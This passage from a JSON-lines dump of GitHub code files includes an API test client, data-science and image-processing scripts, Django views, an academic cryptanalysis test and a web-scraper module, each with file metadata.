164, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 165, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 166, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 167, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 168, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 169, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 170, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 171, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 172, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 173, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 174, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 175, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 180, "usage_type": "call"}, {"api_name": "prediction.get_prediction", "line_number": 185, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 194, "usage_type": "call"}]} +{"seq_id": "14560005247", "text": "from hytest import *\nfrom pprint import pprint\nimport requests,config\n\n# 服务器地址\ntestUrl = GSTORE['testUrl']\n\nclass SMSAPI:\n # 控制台打印\n def _printResponse(self, response):\n print('\\n\\n---------- HTTP response * brgin ----------')\n print(response.status_code)\n for k, v in response.headers.items():\n print(f'{k}:{v}')\n print('')\n print(response.content.decode('utf8'))\n print('---------- HTTP response * end ----------\\n\\n')\n\n #登录API\n def 
login(self,username,password):\n # 创建 Session 对象\n self.s = requests.Session()\n response = self.s.post(url=testUrl+'/api/mgr/signin',\n data=\n {\n \"username\":username, #用户名\n \"password\":password #密码\n })\n self._printResponse(response)\n return response\n\n # 列出所有客户接口(不携带session)\n def customer_list(self, action, pagesize, pagenum, keywords):\n response = requests.get(url=testUrl + '/api/mgr/customers',\n params={\n \"action\": action, # 必填项,填写值为 list_customer\n \"pagesize\": pagesize, # 必填项,分页的 每页获取多少条记录\n \"pagenum\": pagenum, # 必填项,获取第几页的信息\n \"keywords\": keywords # 可选项, 里面包含的多个过滤关键字,关键字之间用 空格 分开\n })\n self._printResponse(response)\n return response\n\n #列出所有客户接口(携带session)\n def customer_list1(self,action,pagesize,pagenum,keywords):\n response = self.s.get(url=testUrl+'/api/mgr/customers',\n params={\n \"action\" :action, #必填项,填写值为 list_customer\n \"pagesize\":pagesize, #必填项,分页的 每页获取多少条记录\n \"pagenum\" :pagenum, #必填项,获取第几页的信息\n \"keywords\":keywords #可选项, 里面包含的多个过滤关键字,关键字之间用 空格 分开\n })\n self._printResponse(response)\n return response\n\n #新增客户接口(携带session)\n def customer_add(self,action,name,phonenumber,address):\n response = self.s.post(url=testUrl+'/api/mgr/customers',\n headers={'Content-Type': 'application/json'},\n json={\n \"action\":action, # action 字段固定填写 add_customer 表示添加一个客户\n \"data\":{\n \"name\":name, # name 字段长度范围是 2-20\n \"phonenumber\":phonenumber, # phonenumber 字段长度范围是 8-15\n \"address\":address # address 字段长度范围是 2-100\n }\n })\n self._printResponse(response)\n return response\n\n #修改客户信息接口\n def customer_modify(self,action,id,name,phonenumber,address):\n response = self.s.put(url=testUrl+'/api/mgr/customers',\n headers={'Conten-Type':'application/json'},\n json={\n \"action\":action, # action 字段固定填写 modify_customer 表示修改一个客户的信息\n \"id\": id, # id 字段为要修改的客户的id号\n \"newdata\":{\n \"name\":name, # name 客户名\n \"phonenumber\":phonenumber, # phonenumber 联系电话\n \"address\":address # address 地址\n }\n })\n self._printResponse(response)\n return response\n\n #删除客户信息接口\n def customer_del(self,action,id):\n response = self.s.post(url=testUrl+'/api/mgr/customers',\n headers={'Content-Type':'application/json'},\n json={\n \"action\":action, # action 字段固定填写 del_customer 表示删除一个客户\n \"id\": id # id 字段为要删除的客户的id号\n })\n self._printResponse(response)\n return response\n\nSMS = SMSAPI()", "repo_name": "chaoxianle/byhySMS", "sub_path": "lib/webapi.py", "file_name": "webapi.py", "file_ext": "py", "file_size_in_byte": 5050, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.Session", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "19056434404", "text": "import seaborn as sns\nfrom sklearn.decomposition import PCA\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndataframe = pd.read_csv(\"small_test.csv\")\n\ndf_rand = np.random.randint(0,10,size=dataframe.shape)\ndataframe = dataframe + df_rand\ndataframe.to_csv(\"small_test.csv\",index=False)\nprint(dataframe)\n\npca = PCA(n_components=2)\nprincipal_components = pca.fit_transform(dataframe)\n\n\nfrom sklearn.cluster import KMeans\nkmeans = KMeans(n_clusters=3)\nkmeans.fit(principal_components)\ncluster_labels = kmeans.labels_\npca_results = pd.DataFrame(data = principal_components, columns = ['PC1', 'PC2'])\npca_results['Cluster'] = cluster_labels\nprint(pca_results)\nsns.scatterplot(x='PC1', y='PC2', hue='Cluster', 
data=pca_results)\nplt.show()\n", "repo_name": "FabianRuizF/clase_big_data", "sub_path": "clase4/ayuda_trabajo2_kmeans.py", "file_name": "ayuda_trabajo2_kmeans.py", "file_ext": "py", "file_size_in_byte": 756, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pandas.read_csv", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 22, "usage_type": "call"}, {"api_name": "seaborn.scatterplot", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "23951943790", "text": "import logging\nimport os\nimport shutil\nimport unittest\nfrom copy import copy\n\nfrom pathlib import Path\nimport yaml\nimport numpy as np\nfrom unittest.mock import patch, Mock\n\nfrom ISR.models.cut_vgg19 import Cut_VGG19\nfrom ISR.models.discriminator import Discriminator\nfrom ISR.models.rrdn import RRDN\nfrom ISR.train.trainer import Trainer\n\n\nclass TrainerClassTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.setup = yaml.load(open(os.path.join('tests', 'data', 'config.yml'), 'r'))\n cls.RRDN = RRDN(arch_params=cls.setup['rrdn'], patch_size=cls.setup['patch_size'])\n cls.f_ext = Cut_VGG19(patch_size=cls.setup['patch_size'] * 2, layers_to_extract=[1, 2])\n cls.discr = Discriminator(patch_size=cls.setup['patch_size'] * 2)\n cls.weights_path = {\n 'generator': os.path.join(cls.setup['weights_dir'], 'test_gen_weights.hdf5'),\n 'discriminator': os.path.join(cls.setup['weights_dir'], 'test_dis_weights.hdf5'),\n }\n cls.temp_data = Path('tests/temporary_test_data')\n \n cls.not_matching_hr = cls.temp_data / 'not_matching_hr'\n cls.not_matching_hr.mkdir(parents=True)\n for item in ['data2.gif', 'data1.png', 'data0.jpeg']:\n (cls.not_matching_hr / item).touch()\n \n cls.not_matching_lr = cls.temp_data / 'not_matching_lr'\n cls.not_matching_lr.mkdir(parents=True)\n for item in ['data1.png']:\n (cls.not_matching_lr / item).touch()\n \n cls.matching_hr = cls.temp_data / 'matching_hr'\n cls.matching_hr.mkdir(parents=True)\n for item in ['data2.gif', 'data1.png', 'data0.jpeg']:\n (cls.matching_hr / item).touch()\n \n cls.matching_lr = cls.temp_data / 'matching_lr'\n cls.matching_lr.mkdir(parents=True)\n for item in ['data1.png', 'data0.jpeg']:\n (cls.matching_lr / item).touch()\n \n with patch('ISR.utils.datahandler.DataHandler._check_dataset', return_value=True):\n cls.trainer = Trainer(\n generator=cls.RRDN,\n discriminator=cls.discr,\n feature_extractor=cls.f_ext,\n lr_train_dir=str(cls.matching_lr),\n hr_train_dir=str(cls.matching_hr),\n lr_valid_dir=str(cls.matching_lr),\n hr_valid_dir=str(cls.matching_hr),\n learning_rate={'initial_value': 0.0004, 'decay_factor': 0.5, 'decay_frequency': 5},\n log_dirs={\n 'logs': './tests/temporary_test_data/logs',\n 'weights': './tests/temporary_test_data/weights',\n },\n dataname='TEST',\n weights_generator=None,\n weights_discriminator=None,\n n_validation=2,\n flatness={'min': 0.01, 'max': 0.3, 'increase': 0.01, 'increase_frequency': 5},\n adam_optimizer={'beta1': 0.9, 'beta2': 0.999, 
'epsilon': None},\n losses={'generator': 'mae', 'discriminator': 'mse', 'feature_extractor': 'mse'},\n loss_weights={'generator': 1.0, 'discriminator': 1.0, 'feature_extractor': 0.5},\n )\n \n @classmethod\n def tearDownClass(cls):\n shutil.rmtree(cls.temp_data)\n pass\n \n def setUp(self):\n pass\n \n def tearDown(self):\n pass\n \n def test__combine_networks_sanity(self):\n mockd_trainer = copy(self.trainer)\n combined = mockd_trainer._combine_networks()\n self.assertTrue(len(combined.layers) == 4)\n# self.assertTrue(len(combined.loss_weights) == 4) TODO: AttributeError: 'Functional' object has no attribute 'loss_weights' (add loss weights to custom compile?)\n# self.assertTrue(np.all(np.array(combined.loss_weights) == [1.0, 1.0, 0.25, 0.25]))\n mockd_trainer.discriminator = None\n combined = mockd_trainer._combine_networks()\n self.assertTrue(len(combined.layers) == 3)\n# self.assertTrue(len(combined.loss_weights) == 3) TODO: AttributeError: 'Functional' object has no attribute 'loss_weights' (add loss weights to custom compile?)\n# self.assertTrue(np.all(np.array(combined.loss_weights) == [1.0, 0.25, 0.25]))\n mockd_trainer.feature_extractor = None\n combined = mockd_trainer._combine_networks()\n self.assertTrue(len(combined.layers) == 2)\n# self.assertTrue(len(combined.loss_weights) == 1) TODO: AttributeError: 'Functional' object has no attribute 'loss_weights' (add loss weights to custom compile?)\n# self.assertTrue(np.all(np.array(combined.loss_weights) == [1.0]))\n try:\n mockd_trainer.generator = None\n combined = mockd_trainer._combine_networks()\n except:\n self.assertTrue(True)\n else:\n self.assertTrue(False)\n \n def test__lr_scheduler(self):\n lr = self.trainer._lr_scheduler(epoch=10)\n expected_lr = 0.0004 * (0.5) ** 2\n self.assertTrue(lr == expected_lr)\n \n def test__flatness_scheduler(self):\n # test with arguments values\n f = self.trainer._flatness_scheduler(epoch=10)\n expected_flatness = 0.03\n self.assertTrue(f == expected_flatness)\n \n # test with specified values\n self.trainer.flatness['increase'] = 0.1\n self.trainer.flatness['increase_frequency'] = 2\n self.trainer.flatness['min'] = 0.1\n self.trainer.flatness['max'] = 1.0\n f = self.trainer._flatness_scheduler(epoch=10)\n expected_flatness = 0.6\n self.assertTrue(f == expected_flatness)\n \n # test max\n self.trainer.flatness['increase'] = 1.0\n self.trainer.flatness['increase_frequency'] = 1\n self.trainer.flatness['min'] = 0.1\n self.trainer.flatness['max'] = 1.0\n f = self.trainer._flatness_scheduler(epoch=10)\n expected_flatness = 1.0\n self.assertTrue(f == expected_flatness)\n \n def test_that_discriminator_and_f_extr_are_not_trainable_in_combined_model(self):\n combined = self.trainer._combine_networks()\n self.assertTrue(combined.get_layer('discriminator').trainable == False)\n self.assertTrue(combined.get_layer('feature_extractor').trainable == False)\n \n def test_that_discriminator_is_trainable_outside_of_combined(self):\n combined = self.trainer._combine_networks()\n y = np.random.random((1, self.setup['patch_size'] * 2, self.setup['patch_size'] * 2, 3))\n discr_out_shape = list(self.discr.model.outputs[0].shape)[1:4]\n valid = np.ones([1] + discr_out_shape)\n \n before_step = []\n for layer in self.trainer.discriminator.model.layers:\n if len(layer.trainable_weights) > 0:\n before_step.append(layer.get_weights()[0])\n \n self.trainer.discriminator.model.train_on_batch(y, valid)\n \n i = 0\n for layer in self.trainer.discriminator.model.layers:\n if len(layer.trainable_weights) > 0:\n 
self.assertFalse(np.all(before_step[i] == layer.get_weights()[0]))\n i += 1\n \n def test_that_feature_extractor_is_not_trainable_outside_of_combined(self):\n mockd_trainer = copy(self.trainer)\n y = np.random.random((1, self.setup['patch_size'] * 2, self.setup['patch_size'] * 2, 3))\n f_ext_out_shape = list(mockd_trainer.feature_extractor.model.outputs[0].shape[1:4])\n f_ext_out_shape1 = list(mockd_trainer.feature_extractor.model.outputs[1].shape[1:4])\n feats = [np.random.random([1] + f_ext_out_shape), np.random.random([1] + f_ext_out_shape1)]\n # should not have optimizer\n try:\n mockd_trainer.feature_extractor.model.train_on_batch(y, [*feats])\n except:\n self.assertTrue(True)\n else:\n self.assertTrue(False)\n \n def test__load_weights(self):\n def check_gen_path(path):\n self.assertTrue(path == 'gen')\n \n def check_discr_path(path):\n self.assertTrue(path == 'discr')\n \n mockd_trainer = copy(self.trainer)\n \n mockd_trainer.pretrained_weights_path = {'generator': 'gen', 'discriminator': 'discr'}\n mockd_trainer.discriminator.model.load_weights = Mock(side_effect=check_discr_path)\n mockd_trainer.model.get_layer('generator').load_weights = Mock(side_effect=check_gen_path)\n mockd_trainer._load_weights()\n \n def test_train(self):\n def nullifier(*args):\n pass\n \n mockd_trainer = copy(self.trainer)\n mockd_trainer.logger = Mock(side_effect=nullifier)\n mockd_trainer.valid_dh.get_validation_set = Mock(return_value={'lr': [], 'hr': []})\n mockd_trainer.train_dh.get_batch = Mock(return_value={'lr': [], 'hr': []})\n mockd_trainer.feature_extractor.model.predict = Mock(return_value=[])\n mockd_trainer.generator.model.predict = Mock(return_value=[])\n mockd_trainer.discriminator.model.train_on_batch = Mock(return_value=[])\n mockd_trainer.model.train_on_batch = Mock(return_value=[])\n mockd_trainer.model.evaluate = Mock(return_value=[])\n mockd_trainer.tensorboard = Mock(side_effect=nullifier)\n mockd_trainer.helper.on_epoch_end = Mock(return_value=True)\n \n logging.disable(logging.CRITICAL)\n mockd_trainer.train(epochs=1, steps_per_epoch=1, batch_size=1, monitored_metrics={})\n", "repo_name": "idealo/image-super-resolution", "sub_path": "tests/train/test_trainer.py", "file_name": "test_trainer.py", "file_ext": "py", "file_size_in_byte": 9444, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4348, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 18, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "ISR.models.rrdn.RRDN", "line_number": 22, "usage_type": "call"}, {"api_name": "ISR.models.cut_vgg19.Cut_VGG19", "line_number": 23, "usage_type": "call"}, {"api_name": "ISR.models.discriminator.Discriminator", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 29, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 51, "usage_type": "call"}, {"api_name": "ISR.train.trainer.Trainer", "line_number": 52, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 77, "usage_type": "call"}, 
{"api_name": "copy.copy", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 160, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 168, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 184, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 187, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 188, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 195, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 196, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 197, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 198, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 199, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 200, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 201, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 202, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 203, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 204, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 205, "usage_type": "call"}, {"api_name": "logging.disable", "line_number": 207, "usage_type": "call"}, {"api_name": "logging.CRITICAL", "line_number": 207, "usage_type": "attribute"}]} +{"seq_id": "35987681756", "text": "#!/usr/bin/python3\n\nfrom PySimpleGUI import Window, Text, Button, WIN_CLOSED\n\nlayout=[\n [Text(\"hello\")],\n [Button(\"Ok\")]\n]\n\nwin = Window(title=\"Hello\", layout=layout, margins=(100, 50))\n\nwhile True:\n event, values = win.read()\n if event == \"Ok\" or event == WIN_CLOSED:\n break\n\nwin.close()\n", "repo_name": "kaoticfire/pyUtilities", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 308, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "PySimpleGUI.Text", "line_number": 6, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 7, "usage_type": "call"}, {"api_name": "PySimpleGUI.Window", "line_number": 10, "usage_type": "call"}, {"api_name": "PySimpleGUI.WIN_CLOSED", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "8349427308", "text": "\nimport cv2\n\n\ndef on_tb_changed_w(pos):\n w = pos / 10\n print(w)\n imsharpen = cv2.add(im, w * im_diff, dtype=cv2.CV_8UC1)\n cv2.imshow('sharpen', imsharpen)\n\n\n# im = cv2.imread('GolyoAlszik_rs.jpg', cv2.IMREAD_COLOR)\nim = cv2.imread('Hermes_h.jpg', cv2.IMREAD_COLOR)\n# im = cv2.imread('webcam_selfie.jpg', cv2.IMREAD_COLOR)\n\nim_blur = cv2.GaussianBlur(im, (5, 5), 2.0)\nim_diff = cv2.subtract(im, im_blur, dtype=cv2.CV_16S)\n\ncv2.imshow('im', im)\ncv2.imshow('im_blur', im_blur)\n\ncv2.namedWindow('sharpen')\ncv2.createTrackbar('W', 'sharpen', 25, 50, on_tb_changed_w)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n", 
"repo_name": "KartalCseh/ImagesProssesing", "sub_path": "Példatár/06_05_a_sharpen.py", "file_name": "06_05_a_sharpen.py", "file_ext": "py", "file_size_in_byte": 614, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "cv2.add", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.CV_8UC1", "line_number": 8, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.subtract", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.CV_16S", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "21532189437", "text": "from api.serializers import Blogsserializer, Projectsserializer\nfrom api.models import Blogs, Projects\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\n\n# Create your views here.\n@api_view(['GET'])\ndef index(request):\n content={\n \"Projects\":\"/projects\",\n \"Blogs\":\"/blogs\"\n }\n return Response(content)\n\n@api_view(['GET'])\ndef projects(request):\n projects=Projects.objects.filter(isfeatured=False)\n featuredproject=Projects.objects.filter(isfeatured=True)\n fps=Projectsserializer(featuredproject,many=True)\n projectserializer=Projectsserializer(projects,many=True)\n return Response({\"active\":projectserializer.data,\"featured\":fps.data})\n\n@api_view(['GET'])\ndef blogs(request):\n blogs=Blogs.objects.filter(active=True)\n bs=Blogsserializer(blogs,many=True)\n return Response(bs.data)\n\n@api_view(['GET'])\ndef blog(request,pk):\n blogs=Blogs.objects.get(pk=pk,active=True)\n bs=Blogsserializer(blogs,)\n return Response(bs.data)\n", "repo_name": "nagadeepsharma/backend", "sub_path": "api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1019, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "rest_framework.response.Response", "line_number": 14, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 8, "usage_type": "call"}, {"api_name": "api.models.Projects.objects.filter", "line_number": 18, "usage_type": "call"}, {"api_name": "api.models.Projects.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "api.models.Projects", "line_number": 18, "usage_type": "name"}, {"api_name": "api.models.Projects.objects.filter", "line_number": 19, "usage_type": "call"}, {"api_name": "api.models.Projects.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "api.models.Projects", "line_number": 19, "usage_type": "name"}, {"api_name": "api.serializers.Projectsserializer", "line_number": 20, "usage_type": "call"}, {"api_name": "api.serializers.Projectsserializer", "line_number": 21, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", 
"line_number": 22, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 16, "usage_type": "call"}, {"api_name": "api.models.Blogs.objects.filter", "line_number": 26, "usage_type": "call"}, {"api_name": "api.models.Blogs.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "api.models.Blogs", "line_number": 26, "usage_type": "name"}, {"api_name": "api.serializers.Blogsserializer", "line_number": 27, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 28, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 24, "usage_type": "call"}, {"api_name": "api.models.Blogs.objects.get", "line_number": 32, "usage_type": "call"}, {"api_name": "api.models.Blogs.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "api.models.Blogs", "line_number": 32, "usage_type": "name"}, {"api_name": "api.serializers.Blogsserializer", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 34, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "74970928124", "text": "from partial_key_recovery import EHTRecoveryFromColumns\nfrom keys import load_public, load_private\n\nimport numpy as np\nimport json\n\ndef test_validity(priv, pub):\n if (priv.C * priv.T - pub.A * priv.B).is_zero():\n print(\"The public and private key are valid\")\n else:\n print(\"Error: CT != AB\")\n return False\n return True\n\ndef test_recovery_from_columns(priv, pub):\n C = priv.C\n\n columns = C.columns()\n\n # Randomly shuffle columns\n np.random.seed(2)\n pi = np.random.permutation(len(columns))\n\n randomized_columns = []\n for i in range(len(columns)):\n sgn = np.random.choice([-1,1])\n col = columns[pi[i]] * sgn\n col = [int(ci) for ci in col]\n randomized_columns += [col]\n\n # Print the randomized columns to a file\n with open(\"debug/C.columns\", \"w\") as g:\n for col in randomized_columns:\n g.write(str(col) + \"\\n\")\n\n # Run the key recovery attack with this file.\n with open(\"debug/C.columns\") as f:\n cols = []\n for line in f:\n col = json.loads(line)\n cols += [col]\n\n problem = EHTRecoveryFromColumns(pub, cols, verbose=True)\n priv = problem.solve()\n if priv is None:\n return False\n\n print(\"Key recovery successful.\")\n with open(\"debug/recovered_private.json\", \"w\") as g:\n g.write(priv)\n \n return True\n\ndef main():\n import sys\n fn_sk = sys.argv[1] if len(sys.argv) > 1 else \"debug/private.json\"\n fn_pk = sys.argv[2] if len(sys.argv) > 2 else \"debug/public.json\"\n \n priv = load_private(fn_sk)\n pub = load_public(fn_pk)\n\n assert test_validity(priv, pub)\n assert test_recovery_from_columns(priv, pub)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "ucsd-hacc/ehtv3_cryptanalysis", "sub_path": "test_attack.py", "file_name": "test_attack.py", "file_ext": "py", "file_size_in_byte": 1734, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.random.seed", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.random.permutation", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 26, 
"usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 40, "usage_type": "call"}, {"api_name": "partial_key_recovery.EHTRecoveryFromColumns", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 56, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 57, "usage_type": "attribute"}, {"api_name": "keys.load_private", "line_number": 59, "usage_type": "call"}, {"api_name": "keys.load_public", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "26082894630", "text": "\"\"\"Property classes for web-related concepts\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom six.moves.urllib.parse import ParseResult, urlparse #pylint: disable=import-error\n\nfrom .. import basic\n\nclass URL(basic.String):\n \"\"\"String property that only accepts valid URLs\n\n This property type uses :code:`urllib.parse` to validate\n input URLs and possibly remove fragments and query params.\n\n **Available keywords** (in addition to those inherited from\n :class:`String `):\n\n * **remove_parameters** - Query params are stripped from input URL (default\n is False).\n * **remove_fragment** - Fragment is stripped from input URL (default\n is False).\n \"\"\"\n\n class_info = 'a URL'\n\n @property\n def remove_parameters(self):\n \"\"\"Should path and query parameters be stripped\"\"\"\n return getattr(self, '_remove_parameters', False)\n\n @remove_parameters.setter\n def remove_parameters(self, value):\n self._remove_parameters = bool(value)\n\n @property\n def remove_fragment(self):\n \"\"\"Should fragment be stripped\"\"\"\n return getattr(self, '_remove_fragment', False)\n\n @remove_fragment.setter\n def remove_fragment(self, value):\n self._remove_fragment = bool(value)\n\n def validate(self, instance, value):\n \"\"\"Check if input is valid URL\"\"\"\n value = super(URL, self).validate(instance, value)\n parsed_url = urlparse(value)\n if not parsed_url.scheme or not parsed_url.netloc:\n self.error(instance, value, extra='URL needs scheme and netloc.')\n parse_result = ParseResult(\n scheme=parsed_url.scheme,\n netloc=parsed_url.netloc,\n path=parsed_url.path,\n params='' if self.remove_parameters else parsed_url.params,\n query='' if self.remove_parameters else parsed_url.query,\n fragment='' if self.remove_fragment else parsed_url.fragment,\n )\n parse_result = parse_result.geturl()\n return parse_result\n\n @property\n def info(self):\n info = 'a URL string'\n if self.remove_parameters:\n info += ', path or query params removed'\n if self.remove_fragment:\n info += ', fragment removed'\n", "repo_name": "seequent/properties", "sub_path": "properties/extras/web.py", "file_name": "web.py", "file_ext": "py", "file_size_in_byte": 2387, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "41", "api": [{"api_name": "six.moves.urllib.parse.urlparse", "line_number": 49, "usage_type": "call"}, {"api_name": "six.moves.urllib.parse.ParseResult", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "74722730362", "text": "from typing import List, Optional, Tuple\nfrom urllib import parse\n\nfrom scrapy.http import HtmlResponse\n\nfrom ashaar.src.base.constants import UNSPECIFIED\nfrom ashaar.src.base.processors import PoetProcessor\n\nfrom ashaar.src.utils import process_multi_spaces\n\nfrom ashaar.src.websites.aldiwan_alarabi.items import AldiwanAlarabiPoetItem\n\n\nclass 
AldiwanAlarabiPoetProcessor(PoetProcessor):\n def process(\n self,\n response: HtmlResponse,\n _,\n previous_poet: Optional[AldiwanAlarabiPoetItem],\n ) -> Tuple[List[str], AldiwanAlarabiPoetItem, Optional[str]]:\n poem_urls = self.__extract_targets_to_follow(response)\n\n return (\n poem_urls,\n AldiwanAlarabiPoetItem(\n url=response.url,\n name=self.__extract_name(response),\n description=self.__extract_description(response),\n poems=list(),\n )\n if previous_poet is None\n else previous_poet,\n self.__build_next_page_target(response) if poem_urls else None,\n )\n\n def __extract_targets_to_follow(self, response: HtmlResponse) -> List[str]:\n return list(filter(lambda url: 'poemDescription' in url, response.xpath('//tr/td/a/@href').getall()))\n\n def __extract_name(self, response: HtmlResponse) -> str:\n return response.xpath(\"//td[@class='portletTitle']/a/text()\").get()[:-1].strip()\n\n def __extract_description(self, response: HtmlResponse) -> str:\n description = response.xpath('//tr[2]/td/span/text()').get()\n\n if description:\n return process_multi_spaces(description).strip()\n\n return UNSPECIFIED\n\n def __build_next_page_target(self, response: HtmlResponse) -> Optional[str]:\n parsed_url = parse.urlsplit(response.url)\n url_parameters = 